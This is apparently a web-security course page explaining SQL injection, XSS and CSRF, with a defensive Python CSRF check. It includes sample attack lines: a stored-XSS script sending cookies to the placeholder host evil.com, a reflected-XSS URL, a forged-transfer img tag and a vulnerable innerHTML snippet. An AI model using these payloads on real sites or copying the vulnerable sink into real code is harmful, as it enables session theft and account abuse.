🔐

Security Track

Understand common web vulnerabilities, attack patterns, and defensive techniques. Essential knowledge for building secure applications and testing for weaknesses.

Sections: 4
Prerequisites: Web basics, HTTP

What You'll Learn

Core Vulnerability Types

SQL Injection

Abusing database queries by injecting malicious SQL code through user input.

Cross-Site Scripting (XSS)

Injecting malicious scripts into websites. The core problem is that HTML carries control (tags, attributes, script) and data (text) in the same character stream, so the browser cannot tell attacker-supplied text from the page's own markup. Any time an attacker can get arbitrary data inserted into a page without escaping, they can run code in the viewer's browser.

PortSwigger has a good article on XSS

Stored XSS (Persistent XSS)

The malicious payload is saved on the server and delivered to every user who views that data.

Example: Attacker posts a comment with a script tag. Anyone loading the page executes that script.

Nice article! <script>fetch('http://evil.com/steal?c='+document.cookie)</script>

Online example (PortSwigger Lab)

Reflected XSS

The payload is immediately bounced ("reflected") back in the server's response, not stored.

Example:

https://example.com/search?q=<script>alert(1)</script>

The server echoes the parameter into the page unescaped: You searched for: <script>alert(1)</script>

Online example

DOM-based XSS (Client-side XSS)

The injection never touches the server. The browser's own JavaScript takes attacker-controlled input and manipulates the DOM unsafely.

<script>
  // Source: everything after '#' in the URL. It is attacker-controlled and the fragment is never sent to the server.
  let query = location.hash.substr(1);
  // Sink: innerHTML parses the string as HTML, so any markup in the fragment is rendered and any script runs.
  document.getElementById('q').innerHTML = query;
</script>

Danger: Because the payload never reaches the server, it completely bypasses server-side sanitization (and server-side logging). The fix has to live in the client code: write untrusted input with textContent rather than innerHTML, or sanitize it before it reaches a DOM sink.

Cross-Site Request Forgery (CSRF)

CSRF happens when a victim's browser, already authenticated to a site, is tricked into making an unwanted request. The attacker "rides" the victim's session cookies to execute unintended actions.

Classic Web CSRF

Pattern: Exploit implicit trust, i.e. credentials the browser attaches to a request on its own (session cookies, and bearer tokens where the client sends them automatically).

  1. Victim is logged into bank.com
  2. Attacker sends victim an email with: <img src="https://bank.com/transfer?to=attacker&amount=1000">
  3. Browser auto-attaches session cookies
  4. Bank server sees valid request → money transfers
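As an added example (not part of the track material), a minimal server-side check in Python that rejects the forged transfer from the walkthrough above and accepts a legitimate form post. bank.com and the session id are the walkthrough's placeholders; the HMAC-bound token, the helper names and the request shape are my own assumptions. A SameSite cookie attribute is a complementary browser-side defence not shown here.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://bank.com"          # placeholder site from the walkthrough
SERVER_SECRET = secrets.token_bytes(32)   # constructed: per-process key for the token MAC


def csrf_token(session_id: str) -> str:
    """Synchronizer-style token bound to the session via HMAC (assumed design: no per-token storage)."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_check(method: str, headers: dict, form: dict, session_id: str) -> tuple[bool, str]:
    """Decide whether a state-changing request (e.g. /transfer) may proceed.

    headers: the request headers as the browser sent them (Origin / Referer if present).
    form:    the decoded POST body.
    session_id: the session identified by the cookie, which CSRF cannot prevent being attached.
    """
    # 1. State changes never ride on GET: an <img src=...> can only ever issue a GET.
    if method.upper() != "POST":
        return False, "state change must use POST"
    # 2. The request must come from our own origin. Browsers set Origin on cross-site
    #    POSTs (falling back to Referer here) and page script cannot forge either header.
    origin = headers.get("Origin") or headers.get("Referer")
    if origin is None:
        return False, "missing Origin/Referer"
    parts = urlsplit(origin)
    if f"{parts.scheme}://{parts.netloc}" != SITE_ORIGIN:
        return False, f"cross-site origin {origin}"
    # 3. The body must carry a token bound to this session; an attacker's page cannot read it.
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token, csrf_token(session_id)):
        return False, "csrf token missing or wrong"
    return True, "ok"


def demo() -> list[tuple[str, bool]]:
    """Run three constructed requests: the forged <img> GET, a forged cross-site POST, a real form post."""
    sid = "sess123"  # constructed session id
    forged_img = csrf_check("GET", {"Referer": "https://evil.com/mail"}, {}, sid)
    forged_post = csrf_check("POST", {"Origin": "https://evil.com"}, {"to": "attacker", "amount": "1000"}, sid)
    legit = csrf_check("POST", {"Origin": SITE_ORIGIN}, {"to": "alice", "csrf_token": csrf_token(sid)}, sid)
    return [("forged img GET", forged_img[0]), ("forged POST", forged_post[0]), ("legit POST", legit[0])]


if __name__ == "__main__":
    for label, ok in demo():
        print(f"{label}: {'allowed' if ok else 'blocked'}")
```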

Other Important Vulnerabilities

OWASP Resources

Standards & Frameworks

Hands-on: Gruyere

Practice Environment

Gruyere is a vulnerable web application for learning security.

Hands-on: Electricity Shop

Internal Vulnerable Application

Electricity Shop is a Tenzai-built vulnerable e-commerce application. Run it locally and find as many vulnerabilities as you can.